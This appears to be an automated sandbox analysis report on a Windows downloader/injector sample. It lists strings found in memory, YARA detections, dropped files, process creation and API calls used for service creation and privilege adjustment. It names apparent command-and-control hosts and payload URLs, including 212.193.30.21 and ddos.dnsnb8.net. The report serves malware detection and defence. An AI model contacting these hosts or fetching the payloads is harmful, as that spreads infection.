              Source: vXQpuA.exe, 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp, vXQpuA.exe, 00000001.00000003.2034288446.0000000000A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000D0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.30.21/
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.30.21/Corporation1
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.30.21/hp
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.30.21/hp0
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.30.21/service/communication.php
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.30.21/service/communication.php$
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.30.21/service/communication.php0
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.30.21/service/communication.phpK
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.30.21/service/communication.phpk_
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.30.21:80/service/communication.php
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.30.29/
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.30.29/server.txt
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.30.45/
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.30.45/proxies.txt
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.193.30.45/proxies.txtE
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048824800.0000000000C7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar&
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar0
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarDownloadManager
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarI
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarW
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rare
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarras
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarx
              Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wfsdragon.ru/
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wfsdragon.ru/api/setStats.php
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wfsdragon.ru:80/api/setStats.php
              Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.com
              Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.comHolger
              Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.com
              Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.comBrendon
              Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.com
              Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.comDeepak
              Source: SciTE.exe.1.drString found in binary or memory: http://www.lua.org
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048824800.0000000000C7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.com
              Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.comJosiah
              Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org
              Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org/scite.rng
              Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.com
              Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.comMathias
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048753029.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/api
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeString found in binary or memory: https://db-ip.com/
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeString found in binary or memory: https://db-ip.com/https://ipgeolocation.io/https://www.maxmind.com/en/locate-my-ip-addresstype
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeString found in binary or memory: https://ipgeolocation.io/
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeString found in binary or memory: https://ipinfo.io/
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeString found in binary or memory: https://ipinfo.io/Content-Type:
              Source: vXQpuA.exe, 00000001.00000002.2257628282.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/A7dSG1te
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/~
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com:443/raw/A7dSG1te
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://softs-portal.com/
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://softs-portal.com/api/registerUser.php
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://softs-portal.com/api/registerUser.phpg
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/J
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048753029.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/file/400780400026/1/xwmW8Qofk5M.263566/16218cb12e7549e76b
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp, 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048753029.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/file/400780400431/1/-u0XrknOtfw.232636/60f98efd626b95d010
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048824800.0000000000C7C000.00000004.00000020.00020000.00000000.sdmp, 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048753029.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/img/t_logo.png
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org:443/P7
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000003.2048753029.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/telegram
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeString found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
              Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/
              Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/Morten
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49724 version: TLS 1.2
              Source: SciTE.exe.1.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_5eb72636-5

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, type: SAMPLEMatched rule: Detects downloader / injector Author: ditekSHen
              Source: 0.0.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
              Source: 0.2.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
              PE file contains section with special chars
              Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
              PE file has a writeable .text section
              Source: vXQpuA.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_0031B1F00_2_0031B1F0
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_003219B00_2_003219B0
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00315BA00_2_00315BA0
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_0031ACD00_2_0031ACD0
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_003420200_2_00342020
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_003610000_2_00361000
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_0035F0AD0_2_0035F0AD
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_0033D0D00_2_0033D0D0
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_003432C00_2_003432C0
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_003153400_2_00315340
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_0031C4500_2_0031C450
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_0035A5830_2_0035A583
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_0035162B0_2_0035162B
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_0035A6A30_2_0035A6A3
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_003427400_2_00342740
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_0033D8C00_2_0033D8C0
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00320A200_2_00320A20
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_0033FAA00_2_0033FAA0
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00377B710_2_00377B71
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00343C200_2_00343C20
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00341C500_2_00341C50
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_0035ACF60_2_0035ACF6
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_0034FD500_2_0034FD50
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00314DE00_2_00314DE0
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_0034DDEF0_2_0034DDEF
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_00313ED00_2_00313ED0
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeCode function: 1_2_006160761_2_00616076
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeCode function: 1_2_00616D001_2_00616D00
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\vXQpuA.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: String function: 00349E80 appears 39 times
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 1392
              Source: MyProg.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, type: SAMPLEMatched rule: MALWARE_Win_DLInjector06 author = ditekSHen, description = Detects downloader / injector
              Source: 0.0.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector06 author = ditekSHen, description = Detects downloader / injector
              Source: 0.2.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector06 author = ditekSHen, description = Detects downloader / injector
              Source: vXQpuA.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: vXQpuA.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: vXQpuA.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
              Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@4/9@7/6
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeCode function: 1_2_0061119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,1_2_0061119F
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: OpenSCManagerA,DeleteFileA,DeleteFileA,CopyFileA,OpenServiceA,CloseServiceHandle,GetUserNameA,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00320A20
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_003202C0 StartServiceCtrlDispatcherA,0_2_003202C0
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCode function: 0_2_003202C0 StartServiceCtrlDispatcherA,0_2_003202C0
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5064
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeFile created: C:\Users\user\AppData\Local\Temp\vXQpuA.exeJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCommand line argument: 0.80_2_003219B0
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeCommand line argument: 0.80_2_003219B0
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeReversingLabs: Detection: 97%
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeString found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
              Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeString found in binary or memory: https://db-ip.com/https://ipgeolocation.io/https://www.maxmind.com/en/locate-my-ip-addresstype must be boolean, but is type must be number, but is type must be number, but is type must be number, but is type must be string, but is GETPOSTMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36-2L-1L0123456789abcdef
              Source: unknownProcess created: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe "C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe"
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeProcess created: C:\Users\user\AppData\Local\Temp\vXQpuA.exe C:\Users\user\AppData\Local\Temp\vXQpuA.exe
              Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 1392
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeProcess created: C:\Users\user\AppData\Local\Temp\vXQpuA.exe C:\Users\user\AppData\Local\Temp\vXQpuA.exeJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exeSection loaded: rsaenh.dllJump to behavior
